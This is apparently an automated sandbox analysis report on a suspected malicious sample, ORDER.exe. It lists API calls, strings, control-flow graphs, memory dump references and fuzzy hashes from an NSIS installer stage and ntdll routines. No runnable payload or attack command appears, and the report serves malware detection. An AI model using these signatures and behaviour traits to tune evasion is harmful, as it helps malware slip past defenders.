                          • Associated: 00000000.00000002.32233557512.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233883086.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_ORDER.jbxd
                          Similarity
                          • API ID: Window$CallMessageProcSendVisible
                          • String ID:
                          • API String ID: 3748168415-3916222277
                          • Opcode ID: a1366604d20516d7a227b416e124a8c8ccbf6a8c92e3cea699473ae65b9a4b61
                          • Instruction ID: 01da3f5901ddaf9404fa7d81b8fd4ad62d8e53e58d7af57a61279808ed2d7cb1
                          • Opcode Fuzzy Hash: a1366604d20516d7a227b416e124a8c8ccbf6a8c92e3cea699473ae65b9a4b61
                          • Instruction Fuzzy Hash: EA018F7110020DABDF209F11DC85E9F3B6AF784758F208037FA04752D1D77A8C92AAAE
                          APIs
                            • Part of subcall function 00405D36: lstrcpynA.KERNEL32(?,?,00000400,00403287,00422F00,NSIS Error), ref: 00405D43
                            • Part of subcall function 0040585F: CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsg5EDA.tmp,?,004058CB,C:\Users\user\AppData\Local\Temp\nsg5EDA.tmp,C:\Users\user\AppData\Local\Temp\nsg5EDA.tmp,?,?,77232EE0,00405616,?,C:\Users\user\AppData\Local\Temp\,77232EE0,00000000), ref: 0040586D
                            • Part of subcall function 0040585F: CharNextA.USER32(00000000), ref: 00405872
                            • Part of subcall function 0040585F: CharNextA.USER32(00000000), ref: 00405886
                          • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsg5EDA.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsg5EDA.tmp,C:\Users\user\AppData\Local\Temp\nsg5EDA.tmp,?,?,77232EE0,00405616,?,C:\Users\user\AppData\Local\Temp\,77232EE0,00000000), ref: 00405907
                          • GetFileAttributesA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsg5EDA.tmp,C:\Users\user\AppData\Local\Temp\nsg5EDA.tmp,C:\Users\user\AppData\Local\Temp\nsg5EDA.tmp,C:\Users\user\AppData\Local\Temp\nsg5EDA.tmp,C:\Users\user\AppData\Local\Temp\nsg5EDA.tmp,C:\Users\user\AppData\Local\Temp\nsg5EDA.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsg5EDA.tmp,C:\Users\user\AppData\Local\Temp\nsg5EDA.tmp,?,?,77232EE0,00405616,?,C:\Users\user\AppData\Local\Temp\,77232EE0), ref: 00405917
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.32233404876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.32233330655.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233481624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233883086.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_ORDER.jbxd
                          Similarity
                          • API ID: CharNext$AttributesFilelstrcpynlstrlen
                          • String ID: C:\Users\user\AppData\Local\Temp\nsg5EDA.tmp
                          • API String ID: 3248276644-1753671414
                          • Opcode ID: 681a1499075d1ef18d3e94b36260b5cb5e6403957cf75bde6daaeed28ee23a5f
                          • Instruction ID: cee4b60d78671bb78a10d3fddc0396ac835ea714c96625339261d657e7680c9f
                          • Opcode Fuzzy Hash: 681a1499075d1ef18d3e94b36260b5cb5e6403957cf75bde6daaeed28ee23a5f
                          • Instruction Fuzzy Hash: 0AF02823105D6026C63233391C09AAF1B95CE86368B24853FFC51B22D1DB3C8863DE7E
                          APIs
                          • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,77232EE0,004036C9,77233410,004034D6,?), ref: 0040370C
                          • GlobalFree.KERNEL32(00658D70), ref: 00403713
                          Strings
                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00403704
                          Memory Dump Source
                          • Source File: 00000000.00000002.32233404876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.32233330655.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233481624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233883086.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_ORDER.jbxd
                          Similarity
                          • API ID: Free$GlobalLibrary
                          • String ID: C:\Users\user\AppData\Local\Temp\
                          • API String ID: 1100898210-3355392842
                          • Opcode ID: 86ea4e8f2e330b4051334ac2fa91e3adcb647da4565bec0431381526e270e322
                          • Instruction ID: 0fe4964e98027e88380181352afc78dea88c0f551701ba437740c6db36bc47f5
                          • Opcode Fuzzy Hash: 86ea4e8f2e330b4051334ac2fa91e3adcb647da4565bec0431381526e270e322
                          • Instruction Fuzzy Hash: 0EE0EC7390512097C6215F96AD04B5ABB686B89B62F06842AED407B3A18B746C418BD9
                          APIs
                          • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402CE5,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\ORDER.exe,C:\Users\user\Desktop\ORDER.exe,80000000,00000003), ref: 00405813
                          • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402CE5,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\ORDER.exe,C:\Users\user\Desktop\ORDER.exe,80000000,00000003), ref: 00405821
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.32233404876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.32233330655.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233481624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233883086.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_ORDER.jbxd
                          Similarity
                          • API ID: CharPrevlstrlen
                          • String ID: C:\Users\user\Desktop
                          • API String ID: 2709904686-3370423016
                          • Opcode ID: c27a981e79bb352b20b7a8c74a9367836393bd04b8b6ccbc39cacac652a51138
                          • Instruction ID: ba052d51ab232c33a65bcd29671eceb75c11827358d6bb1c4ef4a0a5cf44e1aa
                          • Opcode Fuzzy Hash: c27a981e79bb352b20b7a8c74a9367836393bd04b8b6ccbc39cacac652a51138
                          • Instruction Fuzzy Hash: 94D0A77341AD701EE30372109C04B8F6A48CF16300F098462E440B61A0C2780C414BED
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.32238167410.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 00000000.00000002.32238142205.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000000.00000002.32238195639.0000000010003000.00000002.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000000.00000002.32238224100.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_10000000_ORDER.jbxd
                          Similarity
                          • API ID: Global$Free$Alloc
                          • String ID:
                          • API String ID: 1780285237-0
                          • Opcode ID: 6ef9e3687ab983c99c874163fdcc0ee6cc2800f994ca68b8431a209e6fec97f5
                          • Instruction ID: 5d3a3765e571093bf703368c32e31ec5bfeafbef09712c331e02e9e13643e521
                          • Opcode Fuzzy Hash: 6ef9e3687ab983c99c874163fdcc0ee6cc2800f994ca68b8431a209e6fec97f5
                          • Instruction Fuzzy Hash: 6531ABB1808255AFF715CFA8DC89AEA7FE8EB052C1B164115FA45D726CDB34D910CB24
                          APIs
                          • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405B5B,00000000,[Rename],00000000,00000000,00000000), ref: 0040593C
                          • lstrcmpiA.KERNEL32(00405B5B,00000000), ref: 00405954
                          • CharNextA.USER32(00405B5B,?,00000000,00405B5B,00000000,[Rename],00000000,00000000,00000000), ref: 00405965
                          • lstrlenA.KERNEL32(00405B5B,?,00000000,00405B5B,00000000,[Rename],00000000,00000000,00000000), ref: 0040596E
                          Memory Dump Source
                          • Source File: 00000000.00000002.32233404876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.32233330655.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233481624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233883086.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_ORDER.jbxd
                          Similarity
                          • API ID: lstrlen$CharNextlstrcmpi
                          • String ID:
                          • API String ID: 190613189-0
                          • Opcode ID: 0add82ed76356020c4ee8264c56a6ad6875436601f5ed096891bbb40787d2247
                          • Instruction ID: 6acf3bc3cda9f3bfd2525b0ac34aa546eab038af588102683640af0afc927a81
                          • Opcode Fuzzy Hash: 0add82ed76356020c4ee8264c56a6ad6875436601f5ed096891bbb40787d2247
                          • Instruction Fuzzy Hash: 27F0C232604518FFC7129BA4DD40D9FBBA8EF06360B2500AAE800F7250D274EE019FAA

                          Execution Graph

                          Execution Coverage:0%
                          Dynamic/Decrypted Code Coverage:100%
                          Signature Coverage:100%
                          Total number of Nodes:1
                          Total number of Limit Nodes:0
                          execution_graph 44983 32462a80 LdrInitializeThunk

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 5 324634e0-324634ec LdrInitializeThunk
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.32882001004.00000000323F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 323F0000, based on PE: true
                          • Associated: 00000003.00000002.32882001004.0000000032519000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.32882001004.000000003251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_323f0000_ORDER.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 70b8bb77f068bc56f6474067da954a8191f24d7b09e9e05170ad5baaeadaac86
                          • Instruction ID: 0b13a2818f3eb406826e7bfd5d0432d0fca8ecbe95bfeaca14aa44be6e8c84b8
                          • Opcode Fuzzy Hash: 70b8bb77f068bc56f6474067da954a8191f24d7b09e9e05170ad5baaeadaac86
                          • Instruction Fuzzy Hash: 1990023160510402D600615C571474610054BD1201F62C816A0715528DD7A5895575A2

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 0 32462a80-32462a8c LdrInitializeThunk
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.32882001004.00000000323F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 323F0000, based on PE: true
                          • Associated: 00000003.00000002.32882001004.0000000032519000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.32882001004.000000003251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_323f0000_ORDER.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: a9d1cc097de12438bf9e2d6629dc850b1d732d55aefc8311c8315dc28441c974
                          • Instruction ID: afacbf9b5220915ffbe5668cf39096166e23d8bdf8088c1345f4cdeb5c454bcf
                          • Opcode Fuzzy Hash: a9d1cc097de12438bf9e2d6629dc850b1d732d55aefc8311c8315dc28441c974
                          • Instruction Fuzzy Hash: D1900271202000034605715C5614656400A4BE1201B52C426E1305550DD53588957125

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 2 32462bc0-32462bcc LdrInitializeThunk
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.32882001004.00000000323F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 323F0000, based on PE: true
                          • Associated: 00000003.00000002.32882001004.0000000032519000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.32882001004.000000003251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_323f0000_ORDER.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: f744bb2cc23400920018463b6db80630dd93c33dd849aa4260c26cc1a82b10c3
                          • Instruction ID: 56f73318f3e2c843f0a5caf2e9c4ba3efa9a89432997b6a2c785e9ab78012344
                          • Opcode Fuzzy Hash: f744bb2cc23400920018463b6db80630dd93c33dd849aa4260c26cc1a82b10c3
                          • Instruction Fuzzy Hash: 1890023120100402D600659C660868600054BE1301F52D416A5315515ED67588957131

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1 32462b90-32462b9c LdrInitializeThunk
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.32882001004.00000000323F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 323F0000, based on PE: true
                          • Associated: 00000003.00000002.32882001004.0000000032519000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.32882001004.000000003251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_323f0000_ORDER.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: b3cc465410fdd72689a93fbf33d43b8be82fbc5c8818ed557016cd336ae98a8c
                          • Instruction ID: 26452ce04c17e08cd10daf5ec947267772a23c8468a064f9dd88df32445a0481
                          • Opcode Fuzzy Hash: b3cc465410fdd72689a93fbf33d43b8be82fbc5c8818ed557016cd336ae98a8c
                          • Instruction Fuzzy Hash: 1790023120108802D610615C960478A00054BD1301F56C816A4715618DD6A588957121

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 4 32462eb0-32462ebc LdrInitializeThunk
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.32882001004.00000000323F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 323F0000, based on PE: true
                          • Associated: 00000003.00000002.32882001004.0000000032519000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.32882001004.000000003251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_323f0000_ORDER.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: f6560e513f4db9c8137e65e5430e8574cd9509010df6485ab1784dac679e09ce
                          • Instruction ID: b02fdaddec448dc50455be6ed791796a1748d783761eeab878d09e5eb235c09e
                          • Opcode Fuzzy Hash: f6560e513f4db9c8137e65e5430e8574cd9509010df6485ab1784dac679e09ce
                          • Instruction Fuzzy Hash: 8690023120140402D600615C5A1474B00054BD1302F52C416A1355515DD63588557571

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 3 32462d10-32462d1c LdrInitializeThunk
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.32882001004.00000000323F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 323F0000, based on PE: true
                          • Associated: 00000003.00000002.32882001004.0000000032519000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.32882001004.000000003251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_323f0000_ORDER.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: db4fb4be3fbcd22c65a75fea05dd28e542fc5b98c5ee1b311d721f5ac51d694b
                          • Instruction ID: 59208ecb07a15a1c1a00b130ad9cd5539d864d1e3cc1173856e398c7f735f3d3
                          • Opcode Fuzzy Hash: db4fb4be3fbcd22c65a75fea05dd28e542fc5b98c5ee1b311d721f5ac51d694b
                          • Instruction Fuzzy Hash: E890023120100413D611615C570474700094BD1241F92C817A0715518DE6668956B121

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 183 324c9060-324c90a9 184 324c90f8-324c9107 183->184 185 324c90ab-324c90b0 183->185 186 324c9109-324c910e 184->186 187 324c90b4-324c90ba 184->187 185->187 188 324c9893-324c98a7 call 32464b50 186->188 189 324c9215-324c923d call 32468f40 187->189 190 324c90c0-324c90e4 call 32468f40 187->190 197 324c925c-324c9292 189->197 198 324c923f-324c925a call 324c98aa 189->198 199 324c90e6-324c90f3 call 324e92ab 190->199 200 324c9113-324c91b4 GetPEB call 324cd7e5 190->200 203 324c9294-324c9296 197->203 198->203 209 324c91fd-324c9210 RtlDebugPrintTimes 199->209 210 324c91b6-324c91c4 200->210 211 324c91d2-324c91e7 200->211 203->188 208 324c929c-324c92b1 RtlDebugPrintTimes 203->208 208->188 217 324c92b7-324c92be 208->217 209->188 210->211 212 324c91c6-324c91cb 210->212 211->209 213 324c91e9-324c91ee 211->213 212->211 215 324c91f0 213->215 216 324c91f3-324c91f6 213->216 215->216 216->209 217->188 219 324c92c4-324c92df 217->219 220 324c92e3-324c92f4 call 324ca388 219->220 223 324c92fa-324c92fc 220->223 224 324c9891 220->224 223->188 225 324c9302-324c9309 223->225 224->188 226 324c947c-324c9482 225->226 227 324c930f-324c9314 225->227 230 324c961c-324c9622 226->230 231 324c9488-324c94b7 call 32468f40 226->231 228 324c933c 227->228 229 324c9316-324c931c 227->229 233 324c9340-324c9391 call 32468f40 RtlDebugPrintTimes 228->233 229->228 232 324c931e-324c9332 229->232 235 324c9674-324c9679 230->235 236 324c9624-324c962d 230->236 248 324c94b9-324c94c4 231->248 249 324c94f0-324c9505 231->249 239 324c9338-324c933a 232->239 240 324c9334-324c9336 232->240 233->188 275 324c9397-324c939b 233->275 237 324c967f-324c9687 235->237 238 324c9728-324c9731 235->238 236->220 243 324c9633-324c966f call 32468f40 236->243 244 324c9689-324c968d 237->244 245 324c9693-324c96bd call 324c8093 237->245 238->220 247 324c9737-324c973a 238->247 239->233 240->233 261 324c9869 243->261 244->238 244->245 272 324c9888-324c988c 245->272 273 324c96c3-324c971e call 32468f40 RtlDebugPrintTimes 245->273 255 324c97fd-324c9834 call 32468f40 247->255 256 324c9740-324c978a 247->256 257 324c94cf-324c94ee 248->257 258 324c94c6-324c94cd 248->258 252 324c9507-324c9509 249->252 253 324c9511-324c9518 249->253 263 324c950f 252->263 264 324c950b-324c950d 252->264 265 324c953d-324c953f 253->265 285 324c983b-324c9842 255->285 286 324c9836 255->286 259 324c978c 256->259 260 324c9791-324c979e 256->260 262 324c9559-324c9576 RtlDebugPrintTimes 257->262 258->257 259->260 269 324c97aa-324c97ad 260->269 270 324c97a0-324c97a3 260->270 271 324c986d 261->271 262->188 289 324c957c-324c959f call 32468f40 262->289 263->253 264->253 276 324c951a-324c9524 265->276 277 324c9541-324c9557 265->277 280 324c97af-324c97b2 269->280 281 324c97b9-324c97fb 269->281 270->269 279 324c9871-324c9886 RtlDebugPrintTimes 271->279 272->220 273->188 316 324c9724 273->316 287 324c939d-324c93a5 275->287 288 324c93eb-324c9400 275->288 282 324c952d 276->282 283 324c9526 276->283 277->262 279->188 279->272 280->281 281->279 293 324c952f-324c9531 282->293 283->277 291 324c9528-324c952b 283->291 294 324c984d 285->294 295 324c9844-324c984b 285->295 286->285 296 324c93a7-324c93d0 call 324c8093 287->296 297 324c93d2-324c93e9 287->297 290 324c9406-324c9414 288->290 313 324c95bd-324c95d8 289->313 314 324c95a1-324c95bb 289->314 299 324c9418-324c946f call 32468f40 RtlDebugPrintTimes 290->299 291->293 301 324c953b 293->301 302 324c9533-324c9535 293->302 303 324c9851-324c9857 294->303 295->303 296->299 297->290 299->188 319 324c9475-324c9477 299->319 301->265 302->301 309 324c9537-324c9539 302->309 310 324c985e-324c9864 303->310 311 324c9859-324c985c 303->311 309->265 310->271 312 324c9866 310->312 311->261 312->261 317 324c95dd-324c960b RtlDebugPrintTimes 313->317 314->317 316->238 317->188 321 324c9611-324c9617 317->321 319->272 321->247
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.32882001004.00000000323F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 323F0000, based on PE: true
                          • Associated: 00000003.00000002.32882001004.0000000032519000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.32882001004.000000003251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_323f0000_ORDER.jbxd
                          Similarity
                          • API ID: DebugPrintTimes
                          • String ID: $ $0
                          • API String ID: 3446177414-3352262554
                          • Opcode ID: 46802cda868f228d47fb9ff4a53dcdfeb0872ec2ddb80bd3c563b23a14b81675
                          • Instruction ID: c2dbe4bc1853ae2ea17281a742a108c0c6c46c81c435ceaf3dd49e50b3fe68c8
                          • Opcode Fuzzy Hash: 46802cda868f228d47fb9ff4a53dcdfeb0872ec2ddb80bd3c563b23a14b81675
                          • Instruction Fuzzy Hash: 7D3239B9608381AFE354CF68C484B6BBBE5BF88348F04492EF59987350DB74D949CB52

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 392 32458540-324585a1 393 324585a7-324585b8 392->393 394 324950a2-324950a8 392->394 394->393 395 324950ae-324950bb GetPEB 394->395 395->393 396 324950c1-324950c4 395->396 397 324950e1-32495107 call 32462c00 396->397 398 324950c6-324950d0 396->398 397->393 403 3249510d-32495111 397->403 398->393 399 324950d6-324950df 398->399 401 32495138-3249514c call 324253c0 399->401 408 32495152-3249515e 401->408 403->393 405 32495117-3249512c call 32462c00 403->405 405->393 412 32495132 405->412 410 32495164-32495178 408->410 411 32495367-32495373 call 32495378 408->411 414 3249517a 410->414 415 32495196-3249520c 410->415 411->393 412->401 416 3249517c-32495183 414->416 420 3249520e-32495240 call 3241fcf0 415->420 421 32495245-32495248 415->421 416->415 419 32495185-32495187 416->419 422 32495189-3249518c 419->422 423 3249518e-32495190 419->423 432 32495358-3249535d call 324aa130 420->432 425 3249531f-32495322 421->425 426 3249524e-3249529f 421->426 422->416 423->415 427 32495360-32495362 423->427 425->427 428 32495324-32495353 call 3241fcf0 425->428 433 324952d9-3249531d call 3241fcf0 * 2 426->433 434 324952a1-324952d7 call 3241fcf0 426->434 427->408 428->432 432->427 433->432 434->432
                          Strings
                          • corrupted critical section, xrefs: 324952CD
                          • undeleted critical section in freed memory, xrefs: 32495236
                          • Critical section address., xrefs: 3249530D
                          • Invalid debug info address of this critical section, xrefs: 324952C1
                          • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 32495215, 324952A1, 32495324
                          • Thread identifier, xrefs: 32495345
                          • Critical section debug info address, xrefs: 3249522A, 32495339
                          • Address of the debug info found in the active list., xrefs: 324952B9, 32495305
                          • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 324952ED
                          • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 324952D9
                          • 8, xrefs: 324950EE
                          • Critical section address, xrefs: 32495230, 324952C7, 3249533F
                          • Thread is in a state in which it cannot own a critical section, xrefs: 3249534E
                          • double initialized or corrupted critical section, xrefs: 32495313
                          Memory Dump Source
                          • Source File: 00000003.00000002.32882001004.00000000323F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 323F0000, based on PE: true
                          • Associated: 00000003.00000002.32882001004.0000000032519000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.32882001004.000000003251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_323f0000_ORDER.jbxd
                          Similarity
                          • API ID:
                          • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                          • API String ID: 0-2368682639
                          • Opcode ID: bcee7caa1c449cd97f2894f6c6119f61083a8e11112f812c0634858bb4f07589
                          • Instruction ID: 5d5d84a4e79e433a81893f3e196545b7f7e672a93f9a75d7bfdc27377fa21393
                          • Opcode Fuzzy Hash: bcee7caa1c449cd97f2894f6c6119f61083a8e11112f812c0634858bb4f07589
                          • Instruction Fuzzy Hash: DB818AB0901758AFEB10CF94D940B9EFBB5BB48705F208169F944B7280D7B1A981CF64
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.32882001004.00000000323F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 323F0000, based on PE: true
                          • Associated: 00000003.00000002.32882001004.0000000032519000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.32882001004.000000003251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_323f0000_ORDER.jbxd
                          Similarity
                          • API ID:
                          • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$h.D2
                          • API String ID: 0-41683473
                          • Opcode ID: b3876aac6388b9e61da8da8a8a4f9687d2c7614898fcef0bcc10b2b131c0c4db
                          • Instruction ID: 8203f73f0d7be70278b100e5f308d441d61969ddab6f92f309ce5140aed00e50
                          • Opcode Fuzzy Hash: b3876aac6388b9e61da8da8a8a4f9687d2c7614898fcef0bcc10b2b131c0c4db
                          • Instruction Fuzzy Hash: 14B18BB6508351EFD715CF28C440B5BB7E8AF88B48F41492EF99897300DBB1E949CB92
                          APIs
                          • RtlDebugPrintTimes.NTDLL ref: 3241651C
                            • Part of subcall function 32416565: RtlDebugPrintTimes.NTDLL ref: 32416614
                            • Part of subcall function 32416565: RtlDebugPrintTimes.NTDLL ref: 3241665F
                          Strings
                          • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 3247977C
                          • minkernel\ntdll\ldrinit.c, xrefs: 324797A0, 324797C9
                          • apphelp.dll, xrefs: 32416446
                          • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 324797B9
                          • LdrpInitShimEngine, xrefs: 32479783, 32479796, 324797BF
                          • Getting the shim engine exports failed with status 0x%08lx, xrefs: 32479790
                          Memory Dump Source
                          • Source File: 00000003.00000002.32882001004.00000000323F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 323F0000, based on PE: true
